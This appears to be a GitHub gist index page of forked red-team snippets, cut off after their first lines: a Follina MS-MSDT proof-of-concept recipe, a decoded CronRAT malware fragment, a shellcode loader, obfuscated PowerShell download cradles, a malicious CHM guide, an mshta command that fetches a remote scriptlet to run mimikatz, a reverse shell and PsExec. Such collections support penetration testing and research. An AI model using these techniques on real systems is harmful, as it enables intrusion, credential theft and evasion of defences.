thebigplate
@thebigplate
thebigplate / ms-msdt.MD
Created May 31, 2022 20:04 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
thebigplate / _cronrat.sh
Created November 29, 2021 00:28 — forked from gwillem/_cronrat.sh
This is the decoded payload from the CRON loader. Full analysis here: https://sansec.io/research/cronrat
set -eEu
set -o pipefail
trap 'echo "L$LINENO"; O70; exit -1' ERR
O54=4
function O70()
{
if [[ ! -z "${O57+x}" ]]; then
if [[ -f "${O57}" ]]; then
rm -f "${O57}"
fi
thebigplate / shellcodeLoader.c
Created January 26, 2021 23:27 — forked from mgeeky/shellcodeLoader.c
Simplest Windows shellcode loader there can be, purely in C
#include <stdio.h>
#include <stdlib.h>
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
int main(int argc, char **argv) {
if (argc != 2) {
printf("Usage: ./shellcodeLoader <shellcode64>\n");
return 1;
}
thebigplate / Download-Cradles-Oneliners.md
Created January 26, 2021 23:27 — forked from mgeeky/Download-Cradles-Oneliners.md
Various PowerShell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
thebigplate / Get-AntiVirusProduct.ps1
Created January 26, 2021 23:26 — forked from mgeeky/Get-AntiVirusProduct.ps1
Lists installed AntiVirus products and their details. Source: https://stackoverflow.com/a/37842942
function Get-AntiVirusProduct {
[CmdletBinding()]
param (
[parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)]
[Alias('name')]
$computername=$env:computername
)
thebigplate / Malicious-CHM-Guide.md
Created January 26, 2021 23:13 — forked from mgeeky/Malicious-CHM-Guide.md
CheatSheet describing how to create a malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within the "docs" directory and insert the following code into its <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
thebigplate / mimikatz.sct
Created August 7, 2020 00:29 — forked from chrismaddalena/mimikatz.sct
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
thebigplate / Simple_Rev_Shell.cs
Created July 20, 2020 04:32
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
thebigplate / it-doesn't-have-to-be-crazy-at-work.md
Created April 7, 2019 16:00
Some of my favorite quotes from "It Doesn't Have To Be Crazy At Work" by Jason Fried and David Heinemeier Hansson

Any mistakes are my own. Basecamp is a modern software company that (by many estimates) generates millions of dollars in profit each month.

Promise not to promise

Since the beginning of Basecamp, we've been loath to make promises about future product improvements. We've always wanted customers to judge the product they could buy and use today, not some imaginary version that might exist in the future.

The wrong time for real-time

Chat puts conversations on conveyor belts that are perpetually moving away from you. If you're not at your station when the conversation rolls by, you'll never get a chance to put in your two cents. This means if you want to have your say, you need to be paying attention all day (and often to multiple rooms/channels). ... Chat is great for hashing stuff out quickly when speed truly is important. ... It's also great for watercooler-like banter ... building a camaraderie among people during gaps in the workday.

thebigplate / Invoke-Psexec.ps1
Created October 17, 2018 02:56 — forked from HarmJ0y/Invoke-Psexec.ps1
Invoke-Psexec
function Invoke-PsExec {
<#
.SYNOPSIS
This function is a rough port of Metasploit's psexec functionality.
It utilizes Windows API calls to open up the service manager on
a remote machine, creates/run a service with an associated binary
path or command, and then cleans everything up.
Either a -Command or a custom -ServiceEXE can be specified.
For -Commands, a -ResultsFile can also be specified to retrieve the